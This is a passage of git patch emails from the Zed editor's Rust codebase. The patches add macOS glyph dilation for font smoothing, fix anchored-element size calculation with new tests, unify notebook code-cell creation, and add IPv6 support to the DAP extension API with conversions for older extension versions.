3 ++ crates/gpui_macos/src/text_system.rs | 62 +++++++++++++++++++++------- 4 files changed, 66 insertions(+), 18 deletions(-) diff --git a/crates/gpui/src/platform.rs b/crates/gpui/src/platform.rs index 6cd8e9cd8d4d9d..ac36f05c425d6a 100644 --- a/crates/gpui/src/platform.rs +++ b/crates/gpui/src/platform.rs @@ -31,10 +31,10 @@ pub(crate) type PlatformScreenCaptureFrame = core_video::image_buffer::CVImageBu use crate::{ Action, AnyWindowHandle, App, AsyncWindowContext, BackgroundExecutor, Bounds, DEFAULT_WINDOW_SIZE, DevicePixels, DispatchEventResult, Font, FontId, FontMetrics, FontRun, - ForegroundExecutor, GlyphId, GpuSpecs, ImageSource, Keymap, LineLayout, Pixels, PlatformInput, - Point, Priority, RenderGlyphParams, RenderImage, RenderImageParams, RenderSvgParams, Scene, - ShapedGlyph, ShapedRun, SharedString, Size, SvgRenderer, SystemWindowTab, Task, - ThreadTaskTimings, Window, WindowControlArea, hash, point, px, size, + ForegroundExecutor, GlyphId, GpuSpecs, Hsla, ImageSource, Keymap, LineLayout, Pixels, + PlatformInput, Point, Priority, RenderGlyphParams, RenderImage, RenderImageParams, + RenderSvgParams, Scene, ShapedGlyph, ShapedRun, SharedString, Size, SvgRenderer, + SystemWindowTab, Task, ThreadTaskTimings, Window, WindowControlArea, hash, point, px, size, }; use anyhow::Result; #[cfg(any(target_os = "linux", target_os = "freebsd"))] @@ -783,6 +783,10 @@ pub trait PlatformTextSystem: Send + Sync { /// Returns the recommended text rendering mode for the given font and size. fn recommended_rendering_mode(&self, _font_id: FontId, _font_size: Pixels) -> TextRenderingMode; + /// Returns the dilation level to use for a glyph painted in the given color. + fn glyph_dilation_for_color(&self, _color: Hsla) -> u8 { + 0 + } } #[expect(missing_docs)] diff --git a/crates/gpui/src/text_system.rs b/crates/gpui/src/text_system.rs index c7b11ecaa4efc5..bebe180b2627b4 100644 --- a/crates/gpui/src/text_system.rs +++ b/crates/gpui/src/text_system.rs @@ -348,6 +348,11 @@ impl TextSystem { .rasterize_glyph(params, raster_bounds) } + /// Returns the dilation level to use for a glyph painted in the given color. + pub(crate) fn glyph_dilation_for_color(&self, color: Hsla) -> u8 { + self.platform_text_system.glyph_dilation_for_color(color) + } + /// Returns the text rendering mode recommended by the platform for the given font and size. /// The return value will never be [`TextRenderingMode::PlatformDefault`]. pub(crate) fn recommended_rendering_mode( @@ -1007,6 +1012,7 @@ pub struct RenderGlyphParams { pub scale_factor: f32, pub is_emoji: bool, pub subpixel_rendering: bool, + pub dilation: u8, } impl Eq for RenderGlyphParams {} @@ -1020,6 +1026,7 @@ impl Hash for RenderGlyphParams { self.scale_factor.to_bits().hash(state); self.is_emoji.hash(state); self.subpixel_rendering.hash(state); + self.dilation.hash(state); } } diff --git a/crates/gpui/src/window.rs b/crates/gpui/src/window.rs index 4cea82bde7aefb..99374fd042ecd0 100644 --- a/crates/gpui/src/window.rs +++ b/crates/gpui/src/window.rs @@ -3591,6 +3591,7 @@ impl Window { ); let integer_origin = quantized_origin.map(|c| ScaledPixels(c.trunc())); let subpixel_rendering = self.should_use_subpixel_rendering(font_id, font_size); + let dilation = self.text_system().glyph_dilation_for_color(color); let params = RenderGlyphParams { font_id, glyph_id, @@ -3599,6 +3600,7 @@ impl Window { scale_factor, is_emoji: false, subpixel_rendering, + dilation, }; let raster_bounds = self.text_system().raster_bounds(¶ms)?; @@ -3688,6 +3690,7 @@ impl Window { scale_factor, is_emoji: true, subpixel_rendering: false, + dilation: 0, }; let raster_bounds = self.text_system().raster_bounds(¶ms)?; diff --git a/crates/gpui_macos/src/text_system.rs b/crates/gpui_macos/src/text_system.rs index d4ffd2514e3ed1..80145f706eeac8 100644 --- a/crates/gpui_macos/src/text_system.rs +++ b/crates/gpui_macos/src/text_system.rs @@ -35,9 +35,9 @@ use font_kit::{ }; use gpui::{ Bounds, DevicePixels, Font, FontFallbacks, FontFeatures, FontId, FontMetrics, FontRun, - FontStyle, FontWeight, GlyphId, LineLayout, Pixels, PlatformTextSystem, RenderGlyphParams, - Result, SUBPIXEL_VARIANTS_X, ShapedGlyph, ShapedRun, SharedString, Size, TextRenderingMode, - point, px, size, swap_rgba_pa_to_bgra, + FontStyle, FontWeight, GlyphId, Hsla, LineLayout, Pixels, PlatformTextSystem, + RenderGlyphParams, Result, Rgba, SUBPIXEL_VARIANTS_X, ShapedGlyph, ShapedRun, SharedString, + Size, TextRenderingMode, point, px, size, swap_rgba_pa_to_bgra, }; use parking_lot::{RwLock, RwLockUpgradableReadGuard}; use pathfinder_geometry::{ @@ -46,7 +46,7 @@ use pathfinder_geometry::{ vector::Vector2F, }; use smallvec::SmallVec; -use std::{borrow::Cow, char, convert::TryFrom, sync::Arc}; +use std::{borrow::Cow, char, convert::TryFrom, sync::Arc, sync::OnceLock}; use crate::open_type::apply_features_and_fallbacks; @@ -214,6 +214,39 @@ impl PlatformTextSystem for MacTextSystem { ) -> TextRenderingMode { TextRenderingMode::Grayscale } + + fn glyph_dilation_for_color(&self, color: Hsla) -> u8 { + // When font smoothing is enabled, CoreGraphics thickens glyph strokes by an amount that + // depends on the foreground color's luminance. We replicate the logic used by CoreGraphics + // to select between the different levels of dilation. + if !font_smoothing_allowed_by_user() { + return 0; + } + let rgba: Rgba = color.into(); + let luminance = 0.2126 * rgba.r + 0.7152 * rgba.g + 0.0722 * rgba.b; + let level = ((4.0 * luminance) + 0.5).floor() as i32; + level.clamp(0, 4) as u8 + } +} + +fn font_smoothing_allowed_by_user() -> bool { + static ALLOWED: OnceLock = OnceLock::new(); + *ALLOWED.get_or_init(|| { + use core_foundation_sys::preferences::{ + CFPreferencesCopyAppValue, kCFPreferencesCurrentApplication, + }; + + let key = CFString::new("AppleFontSmoothing"); + let value_ref = unsafe { + CFPreferencesCopyAppValue(key.as_concrete_TypeRef(), kCFPreferencesCurrentApplication) + }; + if value_ref.is_null() { + return true; + } + let number = unsafe { CFNumber::wrap_under_create_rule(value_ref as _) }; + // Only an explicit value of `0` means that font smoothing is disabled. + number.to_i64() != Some(0) + }) } impl MacTextSystemState { @@ -361,7 +394,7 @@ impl MacTextSystemState { fn raster_bounds(&self, params: &RenderGlyphParams) -> Result> { let font = &self.fonts[params.font_id.0]; let scale = Transform2F::from_scale(params.scale_factor); - let mut bounds: Bounds = bounds_from_rect_i(font.raster_bounds( + let bounds: Bounds = bounds_from_rect_i(font.raster_bounds( params.glyph_id.0, params.font_size.into(), scale, @@ -369,14 +402,8 @@ impl MacTextSystemState { font_kit::canvas::RasterizationOptions::GrayscaleAa, )?); - // Add 3% of font size as padding, clamped between 1 and 5 pixels - // to avoid clipping of anti-aliased edges. - let pad = - ((params.font_size.as_f32() * 0.03 * params.scale_factor).ceil() as i32).clamp(1, 5); - bounds.origin.x -= DevicePixels(pad); - bounds.size.width += DevicePixels(pad); - - Ok(bounds) + // Expand the bounds by 1 pixel on each side to give CG room for anti-aliasing. + Ok(bounds.dilate(DevicePixels(1))) } fn rasterize_glyph( @@ -438,13 +465,20 @@ impl MacTextSystemState { .subpixel_variant .map(|v| v as f32 / SUBPIXEL_VARIANTS_X as f32); cx.set_text_drawing_mode(CGTextDrawingMode::CGTextFill); - cx.set_gray_fill_color(0.0, 1.0); cx.set_allows_antialiasing(true); cx.set_should_antialias(true); cx.set_allows_font_subpixel_positioning(true); cx.set_should_subpixel_position_fonts(true); cx.set_allows_font_subpixel_quantization(false); cx.set_should_subpixel_quantize_fonts(false); + + if params.dilation > 0 { + let luminance = params.dilation as f64 * 0.25; + cx.set_should_smooth_fonts(true); + cx.set_gray_fill_color(luminance, 1.0); + } else { + cx.set_gray_fill_color(0.0, 1.0); + } self.fonts[params.font_id.0] .native_font() .clone_with_font_size(f32::from(params.font_size) as CGFloat) From f81096f9f21e4337323f7af82d851377a5b50785 Mon Sep 17 00:00:00 2001 From: Agus Zubiaga Date: Wed, 29 Apr 2026 09:12:21 +0200 Subject: [PATCH 087/231] gpui: Fix anchored element size calculation with negative coordinates (#55124) Closes #53202 `Anchored::prepaint` computes the bounding box of its children to determine the size used for fitting the anchored element in the window. Previously, this calculation manually tracked the minimum origin and maximum bottom-right point, initializing the maximum point to `(0, 0)`. If child bounds were in negative coordinates, the maximum point could be clamped to `(0, 0)`, inflating the computed size. This replaces the manual min/max accumulation with `Bounds::union`, starting from the actual child bounds instead of sentinel values. This computes the child bounding box correctly regardless of coordinate sign. --- Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - Fixed a bug where the context menu in the agent panel (and other scrollable surfaces) would appear at the wrong location --- crates/gpui/src/elements/anchored.rs | 129 ++++++++++++++++++++++++--- 1 file changed, 118 insertions(+), 11 deletions(-) diff --git a/crates/gpui/src/elements/anchored.rs b/crates/gpui/src/elements/anchored.rs index ad8fa11b71ee82..29260061bb72ef 100644 --- a/crates/gpui/src/elements/anchored.rs +++ b/crates/gpui/src/elements/anchored.rs @@ -132,19 +132,17 @@ impl Element for Anchored { return; } - let mut child_min = point(Pixels::MAX, Pixels::MAX); - let mut child_max = Point::default(); - for child_layout_id in &request_layout.child_layout_ids { - let child_bounds = window.layout_bounds(*child_layout_id); - child_min = child_min.min(&child_bounds.origin); - child_max = child_max.max(&child_bounds.bottom_right()); - } - let size: Size = (child_max - child_min).into(); + let children_bounds = request_layout + .child_layout_ids + .iter() + .map(|id| window.layout_bounds(*id)) + .reduce(|acc, bounds| acc.union(&bounds)) + .unwrap(); let (origin, mut desired) = self.position_mode.get_position_and_bounds( self.anchor_position, self.anchor, - size, + children_bounds.size, bounds, self.offset, ); @@ -161,7 +159,7 @@ impl Element for Anchored { let switched = Bounds::from_anchor_and_size( anchor.other_side_along(Axis::Horizontal), origin, - size, + children_bounds.size, ); if !(switched.left() < limits.left() || switched.right() > limits.right()) { anchor = anchor.other_side_along(Axis::Horizontal); @@ -173,7 +171,7 @@ impl Element for Anchored { let switched = Bounds::from_anchor_and_size( anchor.other_side_along(Axis::Vertical), origin, - size, + children_bounds.size, ); if !(switched.top() < limits.top() || switched.bottom() > limits.bottom()) { desired = switched; @@ -289,3 +287,112 @@ impl AnchoredPositionMode { } } } + +#[cfg(test)] +mod tests { + use crate::{ + Context, Pixels, PlatformInput, Point, TestAppContext, Window, deferred, div, point, + prelude::*, px, size, + }; + + struct AnchoredTestView { + position: Point, + } + + impl Render for AnchoredTestView { + fn render(&mut self, _window: &mut Window, _cx: &mut Context) -> impl IntoElement { + div().size_full().child( + div() + .id("scroll-container") + .overflow_y_scroll() + .size_full() + .child(div().h(px(2000.)).w_full()) + .child( + deferred( + super::anchored() + .snap_to_window() + .position(self.position) + .child( + div() + .id("menu") + .debug_selector(|| "MENU".into()) + .w(px(200.)) + .h(px(300.)), + ), + ) + .with_priority(1), + ), + ) + } + } + + #[gpui::test] + fn test_anchored_position_without_scroll(cx: &mut TestAppContext) { + let window = cx.open_window(size(px(800.), px(600.)), |_, _| AnchoredTestView { + position: point(px(100.), px(100.)), + }); + + cx.run_until_parked(); + + let menu_bounds = window + .update(cx, |_, window, _| { + window.rendered_frame.debug_bounds.get("MENU").copied() + }) + .unwrap() + .expect("MENU debug bounds not found"); + + assert_eq!(menu_bounds.origin, point(px(100.), px(100.))); + assert_eq!(menu_bounds.size, size(px(200.), px(300.))); + } + + #[gpui::test] + fn test_anchored_position_when_scrolled(cx: &mut TestAppContext) { + let window = cx.open_window(size(px(800.), px(600.)), |_, _| AnchoredTestView { + position: point(px(100.), px(100.)), + }); + + cx.run_until_parked(); + + window + .update(cx, |_, window, cx| { + let event = gpui::ScrollWheelEvent { + position: point(px(400.), px(300.)), + delta: gpui::ScrollDelta::Pixels(point(px(0.), px(-1000.))), + ..Default::default() + }; + window.dispatch_event(PlatformInput::ScrollWheel(event), cx); + }) + .unwrap(); + + cx.run_until_parked(); + + let menu_bounds = window + .update(cx, |_, window, _| { + window.rendered_frame.debug_bounds.get("MENU").copied() + }) + .unwrap() + .expect("MENU debug bounds not found"); + + assert_eq!(menu_bounds.origin, point(px(100.), px(100.))); + assert_eq!(menu_bounds.size, size(px(200.), px(300.))); + } + + #[gpui::test] + fn test_anchored_snaps_to_window(cx: &mut TestAppContext) { + let window = cx.open_window(size(px(800.), px(600.)), |_, _| AnchoredTestView { + position: point(px(100.), px(500.)), + }); + + cx.run_until_parked(); + + let menu_bounds = window + .update(cx, |_, window, _| { + window.rendered_frame.debug_bounds.get("MENU").copied() + }) + .unwrap() + .expect("MENU debug bounds not found"); + + assert_eq!(menu_bounds.origin, point(px(100.), px(300.))); + assert_eq!(menu_bounds.size, size(px(200.), px(300.))); + } +} From dd72e5b4e75ed43e2a57954448556872ebf852b5 Mon Sep 17 00:00:00 2001 From: Finn Evers Date: Wed, 29 Apr 2026 09:14:05 +0200 Subject: [PATCH 088/231] repl: Unify notebook cell creation (#54765) Release Notes: - N/A --------- Co-authored-by: Kirill Bulatov --- crates/repl/src/notebook/cell.rs | 108 ++++++++---------------- crates/repl/src/notebook/notebook_ui.rs | 1 + 2 files changed, 36 insertions(+), 73 deletions(-) diff --git a/crates/repl/src/notebook/cell.rs b/crates/repl/src/notebook/cell.rs index c4c651b50b5645..ac078b3338c1b3 100644 --- a/crates/repl/src/notebook/cell.rs +++ b/crates/repl/src/notebook/cell.rs @@ -203,12 +203,14 @@ impl Cell { let outputs = convert_outputs(outputs, window, cx); Cell::Code(cx.new(|cx| { - CodeCell::load( + CodeCell::new( + CellSource::Existing { + execution_count: *execution_count, + outputs, + }, id.clone(), metadata.clone(), - *execution_count, text, - outputs, notebook_language, window, cx, @@ -430,6 +432,7 @@ impl MarkdownCell { editor.set_text_style_refinement(refinement); editor.set_use_modal_editing(true); editor.disable_mouse_wheel_zoom(); + editor.disable_scrollbars_and_minimap(window, cx); editor }); @@ -659,8 +662,31 @@ pub struct CodeCell { impl EventEmitter for CodeCell {} +pub(super) enum CellSource { + /// Crate a new empty cell + None, + /// Backed by an existing notebook cell + Existing { + execution_count: Option, + outputs: Vec, + }, +} + +impl CellSource { + fn into_outputs(self) -> (Option, Vec) { + match self { + CellSource::Existing { + execution_count, + outputs, + } => (execution_count, outputs), + CellSource::None => Default::default(), + } + } +} + impl CodeCell { - pub fn new( + pub(super) fn new( + cell_source: CellSource, id: CellId, metadata: CellMetadata, source: String, @@ -695,6 +721,7 @@ impl CodeCell { editor.disable_mouse_wheel_zoom(); editor.disable_scrollbars_and_minimap(window, cx); + editor.set_text(source.clone(), window, cx); editor.set_show_gutter(false, cx); editor.set_text_style_refinement(refinement); editor.set_use_modal_editing(true); @@ -708,13 +735,15 @@ impl CodeCell { }); }); + let (execution_count, outputs) = cell_source.into_outputs(); + Self { id, metadata, - execution_count: None, + execution_count, source, editor, - outputs: Vec::new(), + outputs, selected: false, cell_position: None, execution_start_time: None, @@ -736,73 +765,6 @@ impl CodeCell { }); } - /// Load a code cell from notebook file data, including existing outputs and execution count - pub fn load( - id: CellId, - metadata: CellMetadata, - execution_count: Option, - source: String, - outputs: Vec, - notebook_language: Shared>>>, - window: &mut Window, - cx: &mut Context, - ) -> Self { - let buffer = cx.new(|cx| Buffer::local(source.clone(), cx)); - let multi_buffer = cx.new(|cx| MultiBuffer::singleton(buffer.clone(), cx)); - - let editor_view = cx.new(|cx| { - let mut editor = Editor::new( - EditorMode::Full { - scale_ui_elements_with_buffer_font_size: false, - show_active_line_background: false, - sizing_behavior: SizingBehavior::SizeByContent, - }, - multi_buffer, - None, - window, - cx, - ); - - let theme = ThemeSettings::get_global(cx); - let refinement = TextStyleRefinement { - font_family: Some(theme.buffer_font.family.clone()), - font_size: Some(theme.buffer_font_size(cx).into()), - color: Some(cx.theme().colors().editor_foreground), - background_color: Some(gpui::transparent_black()), - ..Default::default() - }; - - editor.disable_mouse_wheel_zoom(); - editor.set_text(source.clone(), window, cx); - editor.set_show_gutter(false, cx); - editor.set_text_style_refinement(refinement); - editor.set_use_modal_editing(true); - editor - }); - - let language_task = cx.spawn_in(window, async move |_this, cx| { - let language = notebook_language.await; - buffer.update(cx, |buffer, cx| { - buffer.set_language(language.clone(), cx); - }); - }); - - Self { - id, - metadata, - execution_count, - source, - editor: editor_view, - outputs, - selected: false, - cell_position: None, - execution_start_time: None, - execution_duration: None, - is_executing: false, - _language_task: language_task, - } - } - pub fn editor(&self) -> &Entity { &self.editor } diff --git a/crates/repl/src/notebook/notebook_ui.rs b/crates/repl/src/notebook/notebook_ui.rs index 1cb876046dd380..78b7f1a4e514b7 100644 --- a/crates/repl/src/notebook/notebook_ui.rs +++ b/crates/repl/src/notebook/notebook_ui.rs @@ -809,6 +809,7 @@ impl NotebookEditor { let code_cell = cx.new(|cx| { super::CodeCell::new( + super::CellSource::None, new_cell_id.clone(), metadata, String::new(), From 53aa82c934b82ea1bba9d966c156c3d556ff0915 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Tom=20Houl=C3=A9?= <13155277+tomhoule@users.noreply.github.com> Date: Wed, 29 Apr 2026 09:27:05 +0200 Subject: [PATCH 089/231] extension_api: Add IPv6 support in DAP extensions API (#54984) Fix forward for #52244 Release Notes: - N/A --- crates/extension_api/wit/since_v0.8.0/dap.wit | 12 +- crates/extension_host/src/wasm_host/wit.rs | 28 +- .../src/wasm_host/wit/since_v0_6_0.rs | 326 +++++++++++++++++- .../src/wasm_host/wit/since_v0_8_0.rs | 89 ++--- 4 files changed, 401 insertions(+), 54 deletions(-) diff --git a/crates/extension_api/wit/since_v0.8.0/dap.wit b/crates/extension_api/wit/since_v0.8.0/dap.wit index 693befe02f9c31..f0fd9bf138d3c5 100644 --- a/crates/extension_api/wit/since_v0.8.0/dap.wit +++ b/crates/extension_api/wit/since_v0.8.0/dap.wit @@ -20,15 +20,23 @@ interface dap { attach(attach-request) } + type ipv4-address = tuple; + type ipv6-address = tuple; + + variant ip-address { + ipv4(ipv4-address), + ipv6(ipv6-address), + } + record tcp-arguments { port: u16, - host: u32, + host: ip-address, timeout: option, } record tcp-arguments-template { port: option, - host: option, + host: option, timeout: option, } diff --git a/crates/extension_host/src/wasm_host/wit.rs b/crates/extension_host/src/wasm_host/wit.rs index 27847422f01680..83bfdbc818e752 100644 --- a/crates/extension_host/src/wasm_host/wit.rs +++ b/crates/extension_host/src/wasm_host/wit.rs @@ -16,7 +16,7 @@ use lsp::LanguageServerName; use release_channel::ReleaseChannel; use task::{DebugScenario, SpawnInTerminal, TaskTemplate, ZedDebugConfig}; -use crate::wasm_host::wit::since_v0_6_0::dap::StartDebuggingRequestArgumentsRequest; +use latest::dap::StartDebuggingRequestArgumentsRequest; use super::{WasmState, wasm_engine}; use anyhow::{Context as _, Result, anyhow}; @@ -1072,18 +1072,19 @@ impl Extension { Ok(Ok(dap_binary)) } Extension::V0_6_0(ext) => { + let task: latest::DebugTaskDefinition = task.try_into()?; let dap_binary = ext .call_get_dap_binary( store, &adapter_name, - &task.try_into()?, + &task.into(), user_installed_path.as_ref().and_then(|p| p.to_str()), resource, ) .await? .map_err(|e| anyhow!("{e:?}"))?; - Ok(Ok(dap_binary)) + Ok(Ok(dap_binary.into())) } Extension::V0_5_0(_) | Extension::V0_4_0(_) @@ -1123,7 +1124,7 @@ impl Extension { .await? .map_err(|e| anyhow!("{e:?}"))?; - Ok(Ok(dap_binary)) + Ok(Ok(dap_binary.into())) } Extension::V0_5_0(_) | Extension::V0_4_0(_) @@ -1154,12 +1155,13 @@ impl Extension { Ok(Ok(dap_binary.try_into()?)) } Extension::V0_6_0(ext) => { - let config = config.into(); + let config: latest::DebugConfig = config.into(); let dap_binary = ext - .call_dap_config_to_scenario(store, &config) + .call_dap_config_to_scenario(store, &config.into()) .await? .map_err(|e| anyhow!("{e:?}"))?; + let dap_binary: latest::DebugScenario = dap_binary.into(); Ok(Ok(dap_binary.try_into()?)) } Extension::V0_5_0(_) @@ -1199,18 +1201,20 @@ impl Extension { Ok(dap_binary.map(TryInto::try_into).transpose()?) } Extension::V0_6_0(ext) => { - let build_config_template = build_config_template.into(); + let build_config_template: latest::dap::TaskTemplate = build_config_template.into(); let dap_binary = ext .call_dap_locator_create_scenario( store, &locator_name, - &build_config_template, + &build_config_template.into(), &resolved_label, &debug_adapter_name, ) .await?; - Ok(dap_binary.map(TryInto::try_into).transpose()?) + Ok(dap_binary + .map(|s| latest::DebugScenario::from(s).try_into()) + .transpose()?) } Extension::V0_5_0(_) | Extension::V0_4_0(_) @@ -1242,12 +1246,14 @@ impl Extension { Ok(Ok(dap_request.into())) } Extension::V0_6_0(ext) => { - let build_config_template = resolved_build_task.try_into()?; + let build_config_template: latest::dap::TaskTemplate = + resolved_build_task.try_into()?; let dap_request = ext - .call_run_dap_locator(store, &locator_name, &build_config_template) + .call_run_dap_locator(store, &locator_name, &build_config_template.into()) .await? .map_err(|e| anyhow!("{e:?}"))?; + let dap_request: latest::DebugRequest = dap_request.into(); Ok(Ok(dap_request.into())) } Extension::V0_5_0(_) diff --git a/crates/extension_host/src/wasm_host/wit/since_v0_6_0.rs b/crates/extension_host/src/wasm_host/wit/since_v0_6_0.rs index bc5674b051772e..91d446e1637bac 100644 --- a/crates/extension_host/src/wasm_host/wit/since_v0_6_0.rs +++ b/crates/extension_host/src/wasm_host/wit/since_v0_6_0.rs @@ -30,7 +30,6 @@ wasmtime::component::bindgen!({ "zed:extension/process": latest::zed::extension::process, "zed:extension/slash-command": latest::zed::extension::slash_command, "zed:extension/context-server": latest::zed::extension::context_server, - "zed:extension/dap": latest::zed::extension::dap, }, }); @@ -384,3 +383,328 @@ impl ExtensionImports for WasmState { latest::ExtensionImports::make_file_executable(self, path).await } } + +impl From for latest::dap::TcpArguments { + fn from(value: dap::TcpArguments) -> Self { + let [a, b, c, d] = std::net::Ipv4Addr::from_bits(value.host).octets(); + Self { + host: latest::dap::IpAddress::Ipv4((a, b, c, d)), + port: value.port, + timeout: value.timeout, + } + } +} + +impl TryFrom for dap::TcpArguments { + type Error = anyhow::Error; + + fn try_from(value: latest::dap::TcpArguments) -> Result { + let host = match value.host { + latest::dap::IpAddress::Ipv4((a, b, c, d)) => { + std::net::Ipv4Addr::new(a, b, c, d).to_bits() + } + latest::dap::IpAddress::Ipv6((a, b, c, d, e, f, g, h)) => { + let addr = std::net::Ipv6Addr::new(a, b, c, d, e, f, g, h); + anyhow::bail!( + "DAP returned IPv6 host {addr}, which the v0.6.0 extension API cannot represent; the extension must be updated to v0.8.0 or later" + ); + } + }; + Ok(Self { + host, + port: value.port, + timeout: value.timeout, + }) + } +} + +impl From for latest::dap::TcpArgumentsTemplate { + fn from(value: dap::TcpArgumentsTemplate) -> Self { + Self { + host: value.host.map(|host| { + let [a, b, c, d] = std::net::Ipv4Addr::from_bits(host).octets(); + latest::dap::IpAddress::Ipv4((a, b, c, d)) + }), + port: value.port, + timeout: value.timeout, + } + } +} + +impl From for dap::TcpArgumentsTemplate { + fn from(value: latest::dap::TcpArgumentsTemplate) -> Self { + Self { + host: value.host.and_then(|host| match host { + latest::dap::IpAddress::Ipv4((a, b, c, d)) => { + Some(std::net::Ipv4Addr::new(a, b, c, d).to_bits()) + } + latest::dap::IpAddress::Ipv6((a, b, c, d, e, f, g, h)) => { + let addr = std::net::Ipv6Addr::new(a, b, c, d, e, f, g, h); + log::warn!( + "Dropping IPv6 host {addr} when handing TCP arguments back to a v0.6.0 extension; update the extension to v0.8.0 or later for IPv6 support" + ); + None + } + }), + port: value.port, + timeout: value.timeout, + } + } +} + +impl From for latest::dap::LaunchRequest { + fn from(value: dap::LaunchRequest) -> Self { + Self { + program: value.program, + cwd: value.cwd, + args: value.args, + envs: value.envs, + } + } +} + +impl From for dap::LaunchRequest { + fn from(value: latest::dap::LaunchRequest) -> Self { + Self { + program: value.program, + cwd: value.cwd, + args: value.args, + envs: value.envs, + } + } +} + +impl From for latest::dap::AttachRequest { + fn from(value: dap::AttachRequest) -> Self { + Self { + process_id: value.process_id, + } + } +} + +impl From for dap::AttachRequest { + fn from(value: latest::dap::AttachRequest) -> Self { + Self { + process_id: value.process_id, + } + } +} + +impl From for latest::DebugRequest { + fn from(value: DebugRequest) -> Self { + match value { + DebugRequest::Launch(req) => Self::Launch(req.into()), + DebugRequest::Attach(req) => Self::Attach(req.into()), + } + } +} + +impl From for DebugRequest { + fn from(value: latest::DebugRequest) -> Self { + match value { + latest::DebugRequest::Launch(req) => Self::Launch(req.into()), + latest::DebugRequest::Attach(req) => Self::Attach(req.into()), + } + } +} + +impl From for latest::DebugConfig { + fn from(value: DebugConfig) -> Self { + Self { + label: value.label, + adapter: value.adapter, + request: value.request.into(), + stop_on_entry: value.stop_on_entry, + } + } +} + +impl From for DebugConfig { + fn from(value: latest::DebugConfig) -> Self { + Self { + label: value.label, + adapter: value.adapter, + request: value.request.into(), + stop_on_entry: value.stop_on_entry, + } + } +} + +impl From for latest::dap::TaskTemplate { + fn from(value: dap::TaskTemplate) -> Self { + Self { + label: value.label, + command: value.command, + args: value.args, + env: value.env, + cwd: value.cwd, + } + } +} + +impl From for dap::TaskTemplate { + fn from(value: latest::dap::TaskTemplate) -> Self { + Self { + label: value.label, + command: value.command, + args: value.args, + env: value.env, + cwd: value.cwd, + } + } +} + +impl From for latest::dap::BuildTaskDefinition { + fn from(value: dap::BuildTaskDefinition) -> Self { + match value { + dap::BuildTaskDefinition::ByName(name) => Self::ByName(name), + dap::BuildTaskDefinition::Template(payload) => { + Self::Template(latest::dap::BuildTaskDefinitionTemplatePayload { + locator_name: payload.locator_name, + template: payload.template.into(), + }) + } + } + } +} + +impl From for dap::BuildTaskDefinition { + fn from(value: latest::dap::BuildTaskDefinition) -> Self { + match value { + latest::dap::BuildTaskDefinition::ByName(name) => Self::ByName(name), + latest::dap::BuildTaskDefinition::Template(payload) => { + Self::Template(dap::BuildTaskDefinitionTemplatePayload { + locator_name: payload.locator_name, + template: payload.template.into(), + }) + } + } + } +} + +impl From for latest::DebugScenario { + fn from(value: DebugScenario) -> Self { + Self { + label: value.label, + adapter: value.adapter, + build: value.build.map(Into::into), + config: value.config, + tcp_connection: value.tcp_connection.map(Into::into), + } + } +} + +impl From for DebugScenario { + fn from(value: latest::DebugScenario) -> Self { + Self { + label: value.label, + adapter: value.adapter, + build: value.build.map(Into::into), + config: value.config, + tcp_connection: value.tcp_connection.map(Into::into), + } + } +} + +impl From for latest::DebugTaskDefinition { + fn from(value: DebugTaskDefinition) -> Self { + Self { + label: value.label, + adapter: value.adapter, + config: value.config, + tcp_connection: value.tcp_connection.map(Into::into), + } + } +} + +impl From for DebugTaskDefinition { + fn from(value: latest::DebugTaskDefinition) -> Self { + Self { + label: value.label, + adapter: value.adapter, + config: value.config, + tcp_connection: value.tcp_connection.map(Into::into), + } + } +} + +impl From + for latest::dap::StartDebuggingRequestArgumentsRequest +{ + fn from(value: dap::StartDebuggingRequestArgumentsRequest) -> Self { + match value { + dap::StartDebuggingRequestArgumentsRequest::Launch => Self::Launch, + dap::StartDebuggingRequestArgumentsRequest::Attach => Self::Attach, + } + } +} + +impl From + for dap::StartDebuggingRequestArgumentsRequest +{ + fn from(value: latest::dap::StartDebuggingRequestArgumentsRequest) -> Self { + match value { + latest::dap::StartDebuggingRequestArgumentsRequest::Launch => Self::Launch, + latest::dap::StartDebuggingRequestArgumentsRequest::Attach => Self::Attach, + } + } +} + +impl From for latest::dap::StartDebuggingRequestArguments { + fn from(value: dap::StartDebuggingRequestArguments) -> Self { + Self { + configuration: value.configuration, + request: value.request.into(), + } + } +} + +impl From for dap::StartDebuggingRequestArguments { + fn from(value: latest::dap::StartDebuggingRequestArguments) -> Self { + Self { + configuration: value.configuration, + request: value.request.into(), + } + } +} + +impl From for latest::DebugAdapterBinary { + fn from(value: DebugAdapterBinary) -> Self { + Self { + command: value.command, + arguments: value.arguments, + envs: value.envs, + cwd: value.cwd, + connection: value.connection.map(Into::into), + request_args: value.request_args.into(), + } + } +} + +impl TryFrom for DebugAdapterBinary { + type Error = anyhow::Error; + + fn try_from(value: latest::DebugAdapterBinary) -> Result { + Ok(Self { + command: value.command, + arguments: value.arguments, + envs: value.envs, + cwd: value.cwd, + connection: value.connection.map(TryInto::try_into).transpose()?, + request_args: value.request_args.into(), + }) + } +} + +impl zed::extension::dap::Host for WasmState { + async fn resolve_tcp_template( + &mut self, + template: dap::TcpArgumentsTemplate, + ) -> wasmtime::Result> { + let result = latest::dap::Host::resolve_tcp_template(self, template.into()).await?; + Ok( + result + .and_then(|args| dap::TcpArguments::try_from(args).map_err(|err| err.to_string())), + ) + } +} diff --git a/crates/extension_host/src/wasm_host/wit/since_v0_8_0.rs b/crates/extension_host/src/wasm_host/wit/since_v0_8_0.rs index 24cf0affd77589..8da53ca638c004 100644 --- a/crates/extension_host/src/wasm_host/wit/since_v0_8_0.rs +++ b/crates/extension_host/src/wasm_host/wit/since_v0_8_0.rs @@ -1,10 +1,4 @@ -use crate::wasm_host::wit::since_v0_6_0::{ - dap::{ - BuildTaskDefinition, BuildTaskDefinitionTemplatePayload, StartDebuggingRequestArguments, - TcpArguments, TcpArgumentsTemplate, - }, - slash_command::SlashCommandOutputSection, -}; +use crate::wasm_host::wit::since_v0_6_0::slash_command::SlashCommandOutputSection; use crate::wasm_host::wit::{CompletionKind, CompletionLabelDetails, InsertTextFormat, SymbolKind}; use crate::wasm_host::{WasmState, wit::ToWasmtimeResult}; use ::http_client::{AsyncBody, HttpRequestExt}; @@ -24,7 +18,7 @@ use project::project_settings::ProjectSettings; use semver::Version; use std::{ env, - net::{IpAddr, Ipv4Addr}, + 